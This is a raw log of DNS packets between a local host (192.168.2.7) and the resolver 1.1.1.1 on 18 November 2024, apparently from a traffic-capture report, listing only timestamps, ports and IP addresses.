                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.949701071 CET53614331.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.634742022 CET5100953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.642368078 CET53510091.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.740525007 CET5577353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.748471975 CET53557731.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.322921038 CET6530653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.330122948 CET53653061.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.334281921 CET4986453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.341084957 CET53498641.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.596249104 CET4956953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.604540110 CET53495691.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.758394003 CET5034753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.765487909 CET53503471.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.099328995 CET5100953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.106720924 CET53510091.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.465641975 CET5937253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.473191023 CET53593721.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.934812069 CET6027453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.943305969 CET53602741.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.169683933 CET5239453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.176996946 CET53523941.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.857629061 CET5875153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.880137920 CET5875153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.112297058 CET53587511.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.113336086 CET53587511.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.126230955 CET5171953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.133760929 CET53517191.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.146985054 CET5171953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.155404091 CET53517191.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.839443922 CET5540753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.846528053 CET53554071.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.584146976 CET5794353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.591638088 CET53579431.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.608921051 CET5245053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.616041899 CET53524501.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.445046902 CET5916453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.452527046 CET53591641.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.136277914 CET5323553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.143625021 CET53532351.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.215051889 CET5305353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.247294903 CET5305353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.011148930 CET5006553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.022378922 CET53500651.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.155771971 CET53530531.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.155805111 CET53530531.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.839175940 CET5918353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.846698999 CET53591831.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.883306026 CET5142853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.890394926 CET53514281.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.694978952 CET5410553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.702167034 CET53541051.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.892904997 CET5281953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.900300980 CET53528191.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.556070089 CET5699253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.563630104 CET53569921.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.758970976 CET6489353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.765955925 CET53648931.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.051883936 CET5514253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.059454918 CET53551421.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.245014906 CET5591453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.252558947 CET53559141.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.550003052 CET6299053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.556916952 CET53629901.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.702708006 CET5589753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.710139036 CET53558971.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.398457050 CET5650953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.399523020 CET4940353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.406223059 CET53565091.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.406423092 CET53494031.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.087512016 CET6137353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.089627028 CET5191653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.097002029 CET53613731.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.098444939 CET53519161.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.813127041 CET5975053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.820867062 CET53597501.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:30.583060026 CET5498253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:30.592092991 CET53549821.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.268332958 CET5831753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.286505938 CET5831753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.371397018 CET6546453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.395946026 CET6546453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.435739994 CET53654641.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.452827930 CET53654641.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.470834017 CET53583171.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.470849991 CET53583171.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.164616108 CET5185253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.165191889 CET5665053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.171827078 CET53518521.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.173072100 CET53566501.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.067120075 CET6056553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.074729919 CET53605651.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.670351982 CET5494853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.677510023 CET53549481.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.933516026 CET6475453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.944257975 CET53647541.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.558624983 CET5812953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.566488028 CET53581291.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.420573950 CET5723753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.427711010 CET53572371.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.918647051 CET5900853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.926429033 CET53590081.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.217933893 CET5450753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.226114035 CET53545071.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.615261078 CET4933853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.646121979 CET4933853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.798254967 CET53493381.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.798295021 CET53493381.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.085629940 CET5227253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.095590115 CET53522721.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.481383085 CET6456253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.488301039 CET53645621.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.955117941 CET5502153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.962125063 CET53550211.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.630703926 CET5781953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.639116049 CET53578191.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.952658892 CET5910553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.960383892 CET53591051.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.498167992 CET6128153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.505208015 CET53612811.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.506052971 CET6281353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.513390064 CET53628131.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.985797882 CET6240853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.993443966 CET53624081.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.360524893 CET5964453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.368411064 CET53596441.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.718599081 CET6170853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.725897074 CET53617081.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.065766096 CET6347753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.073019028 CET53634771.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.932074070 CET5558953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.940227032 CET53555891.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.196856022 CET5658353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.204468012 CET53565831.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.063513994 CET6014853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.071475029 CET53601481.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.583108902 CET5569953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.591011047 CET53556991.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.451430082 CET5911553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.459870100 CET53591151.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.530579090 CET5361853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.552273035 CET5361853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.559254885 CET53536181.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.718513012 CET53536181.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.311122894 CET5082953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.318339109 CET53508291.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.132097006 CET5413653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.139082909 CET53541361.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.991430998 CET5950853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.998436928 CET53595081.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.688134909 CET6193053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.695607901 CET53619301.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.204539061 CET6352553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.212111950 CET53635251.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.549683094 CET5605053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.556847095 CET53560501.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.557477951 CET6320153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.564762115 CET53632011.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.073793888 CET5578753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.081774950 CET53557871.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.407421112 CET5751453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.415080070 CET53575141.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.758795977 CET5752653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.766370058 CET53575261.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.103833914 CET5723653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.110938072 CET53572361.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.480915070 CET6026953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.488208055 CET53602691.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.959681034 CET5921853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.967355967 CET53592181.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.568980932 CET6154053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.576612949 CET53615401.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.809674025 CET5937053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.816905022 CET53593701.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.265484095 CET5491753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.272480965 CET53549171.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.654738903 CET5385453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.661731958 CET53538541.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.116975069 CET6515553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.124900103 CET53651551.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.510680914 CET5373853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.517987013 CET53537381.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.799671888 CET5810453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.807523012 CET53581041.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.658502102 CET4925353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.665997028 CET53492531.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.009767056 CET5011953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.017503023 CET53501191.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.517498016 CET5466753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.526622057 CET53546671.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.993660927 CET6155553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.002403975 CET53615551.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.416582108 CET5456353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.424093962 CET53545631.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.680763006 CET6391853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.688081026 CET53639181.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.376110077 CET5757653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.383866072 CET53575761.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.889673948 CET6218453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.896861076 CET53621841.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.251856089 CET5511353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.262176037 CET53551131.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.933310032 CET5922453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.941510916 CET53592241.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.563884020 CET5318853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.571365118 CET53531881.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.126430035 CET5635553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.134430885 CET53563551.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.256401062 CET5392653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.264435053 CET53539261.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.834011078 CET5800753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.842132092 CET53580071.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.694418907 CET5581353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.702601910 CET53558131.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.725127935 CET5062453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.731010914 CET6240853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.732208014 CET53506241.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.732795954 CET6251053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.738410950 CET53624081.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.741246939 CET53625101.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:04.589370966 CET6073753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:04.597167015 CET53607371.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.227632046 CET5493853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.235400915 CET53549381.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.236211061 CET5815853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.244580030 CET53581581.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.245189905 CET5209453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.252717972 CET53520941.1.1.1192.168.2.7
